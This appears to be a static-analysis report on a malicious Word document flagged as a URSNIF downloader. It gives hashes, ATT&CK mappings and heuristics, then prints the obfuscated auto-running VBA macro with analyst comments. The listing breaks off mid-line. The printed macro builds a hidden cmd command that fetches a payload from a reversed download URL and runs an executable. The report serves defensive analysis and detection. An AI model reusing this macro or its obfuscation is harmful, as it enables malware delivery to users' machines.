Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 20dc9bef3d5831a7…

MALICIOUS

Office (OLE)

Size: 72.1 KB. Created: 2018-09-11 10:48:00. Authoring application: Microsoft Office Word. First seen: 2018-10-09.
MD5: 1d84e2b1d2e641d861544f2faa57074e SHA-1: 685e07fada82330e4ae3e55d1c16677ade192b5a SHA-256: 20dc9bef3d5831a71cc98aebcd3b84ae259a5a9b882a7fb7ae41567777eb1cb3
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic), T1059 (Command and Scripting Interpreter), T1204.002 (Malicious File)

The sample contains a VBA macro that calls the Shell() function, which launches an external command from the document — an indicator of an attempt to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' strongly suggests a downloader family. Document_Open is a common auto-execution trigger: the macro runs as soon as the document is opened, so no further user interaction is needed once macros are enabled.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The VBA code calls Shell(), which starts an external command or program from within the document.
  • Document_Open macro high OLE_VBA_DOCOPEN
    The macro is bound to the Document_Open event and therefore runs automatically when the document is opened.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — found in document text (OLE body). This is the standard DrawingML XML namespace identifier present in ordinary Office files, not a download location; the actual payload URL is built at runtime inside the macro and is not recoverable from this string.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6749 bytes
SHA-256: 7a9db0b3c2f2d6163800ab65cc469f25c12bd761303af9e4214ef45d633ec0ab
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wUqniJN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-executing entry point: Word runs Document_Open as soon as the file is
' opened with macros enabled (ATT&CK T1204.002 / T1059.005). The whole body
' runs under On Error Resume Next, so a failing statement never stops it.
Private Sub Document_open()
On _
Error _
Resume _
Next
   ' Each "VarType <string> + <string>" line evaluates a concatenation and
   ' discards the result. These statements have no effect; they only pad and
   ' obfuscate the macro so the single real statement below is harder to spot.
   VarType "2199" + "4777" + "6502" + "JduA"
   VarType "YJQjhoTUaG" + "9273"
   VarType "mShb" + "495619813" + "o" + "1217"
   VarType "QAUYYZv" + "QT" + "QuYoQwzsms" + "3522"
   VarType "26951348" + "27721404"
   VarType "457642371" + "Zw" + "poutjpbQzdl" + "rBTj"
   VarType "p" + "kVQWTk"
   VarType "pwKWmshc" + "8038"
' The only effective statement. Four string fragments returned by functions in
' module "JViqjNE" (sHUrUVruHj, UkiNZL, kuRhihOo; SuZpUo is outside the visible
' excerpt) are concatenated into one command line and passed to Shell. The
' second argument, Format(vbHide), is the vbHide window style rendered as a
' string, so the spawned process has no visible window.
' Detection angle: a child process started by WINWORD.EXE immediately after
' document open, with a hidden window.
Shell sHUrUVruHj + UkiNZL + kuRhihOo + SuZpUo, Format(vbHide)
   VarType "QLib" + "291068158"
   VarType "PNrPClXjF" + "8016"
End Sub



Attribute VB_Name = "JViqjNE"
' Returns the first of four string fragments that Document_open concatenates
' and passes to Shell. The fragment is the start of the command line.
' Obfuscation used here: (1) no-op "VarType" statements, (2) single characters
' produced as Chr(<sum>) instead of literals, (3) the string is split into many
' short literals, (4) caret (^) characters, which cmd.exe treats as escape
' characters and strips before execution.
Function sHUrUVruHj()

On _
Error _
Resume _
Next
VarType "O" + "8804" + "OFkuuOBUoFznw" + "DQNGWCk"
   VarType "RJqw" + "5009"
   VarType "l" + "jLLnqKmkqjJk"
   VarType "w" + "125339705" + "TjtWlhL" + "ii"
   VarType "433523758" + "423796162" + "fqBjtiC" + "bXHLlU"
' Chr(4 + 9 + 10 + 6 + 70) = Chr(99) = "c"; Chr(2 + 6 + 7 + 4 + 48) = Chr(67) = "C";
' Chr(1 + 3 + 3 + 2 + 25) = Chr(34) = the double-quote character.
' Once the carets are removed by cmd.exe this fragment reads
' cmd /V:ON/C"set Fw0= ...  — i.e. the macro launches cmd.exe with delayed
' variable expansion enabled. A cmd.exe command line containing /V:ON and
' dense caret sequences, spawned from an Office process, is a useful hunting
' signature.
EXtwYuwhGwU = Format(Chr(4 + 9 + 10 + 6 + 70)) + "m" + "d" + " " + "/V" + "^:ON/" + Format(Chr(2 + 6 + 7 + 4 + 48)) + Format(Chr(1 + 3 + 3 + 2 + 25)) + "s^e" + "^t" + " ^F" + "^w0" + "=^ " + "^ ^ "
VarType "1489" + "lnUrPQMpjvtLz"
   VarType "6192" + "KF" + "5066" + "129354974"
   VarType "P" + "DmBEMLm"
   VarType "fImm" + "YQqLR"
' The remaining fragments are caret-laced text. Read with the carets removed,
' pieces such as "hctac", "kaerb" and "ekovnI" look like reversed script
' tokens; presumably the cmd stage reverses the assembled string before
' running it (not verified from this excerpt — confirm with dynamic analysis).
hwXfBY = "^   ^" + "  " + "^ ^  ^ " + "^ ^    " + "^}^}{^h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "ta" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^}" + ";^k" + "^aerb;^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^" + " m^e^t" + "^"
VarType "biJTIwq" + "URthoI"
   VarType "2443" + "s" + "OfiGSr" + "7687"
   VarType "aXF" + "G" + "HcDdASSVJa" + "1125"
   VarType "OwA" + "cSPsv" + "LdPvzGd" + "426513014"
pmLVpi = "I^" + "-^e^k^o" + "vnI^" + ";)^F" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^Z$^ ^," + "^tBK^$" + "(^el^i^" + "F^d" + "^a^o^ln" + "w^"
VarType "9566" + "441695958" + "328047719" + "pGA"
   VarType "BBJG" + "GaIM"
QsMiH = "o^" + "D^.^" + "KR" + "N" + "${yr^t^"
VarType "iw" + "Nz" + "377309567" + "SIV"
   VarType "136454831" + "477165620"
   VarType "aQQ" + "283245583"
   VarType "miSt" + "7408"
qKBXWWQdNJ = "{)lEh" + "^$ n^" + "i ^t^B" + "K^$(" + "h" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "^aer" + "^o^f;" + "'"
' Return value: the five pieces joined in order (this is the function's
' implicit return in VBA).
sHUrUVruHj = EXtwYuwhGwU + hwXfBY + pmLVpi + QsMiH + qKBXWWQdNJ
   VarType "1258" + "ZvQtot"
   VarType "1212" + "4461"
End Function
' Returns the second string fragment of the Shell command line built in
' Document_open. Same obfuscation pattern as sHUrUVruHj: no-op VarType
' statements, Chr(4 + 9 + 10 + 6 + 70) = "c" in place of a literal, short
' split literals, and caret escape characters that cmd.exe strips.
Function UkiNZL()

On _
Error _
Resume _
Next
VarType "EGBJ" + "9483" + "iRVODFXo" + "166559592"
   VarType "nqA" + "aUt"
   VarType "hMJE" + "3729" + "CTRWfOiihmUfQ" + "7367"
' Contains "^exe.'+" — read backwards, a ".exe" file extension — suggesting
' the assembled command writes or launches an executable. Hedged: the exact
' path is only recoverable after the cmd/script stage de-obfuscates it.
GDEiThMB = "^exe.'+" + "^Uz" + "w^" + "$+" + "'^\" + "'^+" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "i"
VarType "Pq" + "qUbwjbk"
   VarType "6631" + "202324990" + "451683710" + "NFv"
oKiUd = "^l" + "^b^u^p:" + "vn" + "e$^=^" + "F" + Format(Chr(4 + 9 + 10 + 6 + 70))
VarType "vbLAMOkwDSZ" + "3273" + "pVOTEptf" + "cJ"
   VarType "IVIHIH" + "A"
vrcVptR = "Z" + "^" + "$^;^'^3" + "^3^3' =" + " ^Uzw" + "^$^;" + ")^'^@" + "^'(" + "ti" + "l^pS^." + "^"
VarType "370046613" + "HOiJGVYd" + "k" + "nutBGKrQTRpSE"
   VarType "5781" + "rvLXrnIX"
' These two fragments carry what reads as a reversed URL: KSEfaAsw ends with
' "la//:^p" + "t" + "^t^h", i.e. "http://" backwards, and SDGdRjHzpD looks like
' a reversed path ("/se^gam^i/", "s^em eh^t/"). The download location is the
' key IoC of this sample; obtain it from dynamic analysis or a full
' de-obfuscation rather than reading it off this fragment, since the cmd stage
' may transform it further.
SDGdRjHzpD = "'^ORG" + "/se" + "^gam^" + "i/x" + "^u^" + "d^er^" + "-^d" + "emar" + "^f/s^em" + "eh^t/tn"
VarType "851" + "SisHfX" + "KuaRQPkZVr" + "1059"
   VarType "jZ" + "DjPzMhONHBsJlu"
   VarType "6074" + "vaQd" + "9940" + "29347307"
KSEfaAsw = "etn" + "^" + "o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + "-" + "^pw" + "/m^o" + Format(Chr(4 + 9 + 10 + 6 + 70)) + ".re^" + "se" + "y" + "la//:^p" + "t" + "^t^h"
' Return value: the five pieces joined in order.
UkiNZL = GDEiThMB + oKiUd + vrcVptR + SDGdRjHzpD + KSEfaAsw
   VarType "1308" + "485983852"
   VarType "JfiBOwt" + "2756" + "273624648" + "kTvUaOjFFCrjw"
End Function
Function kuRhihOo()

On _
Error _
Resume _
Next
VarType "CMqhjHAT" + "N" + "TmF" + "uzm"
   VarType "UfpsajFQBoID" + "FQ"
   VarType "QKGVwoW" + "1338" + "PlIW" + "8900"
knALszN = "^@" + "RY" + "^" + "WR^B/^m" + "^o" + Format(Chr(4 + 9 
... (truncated)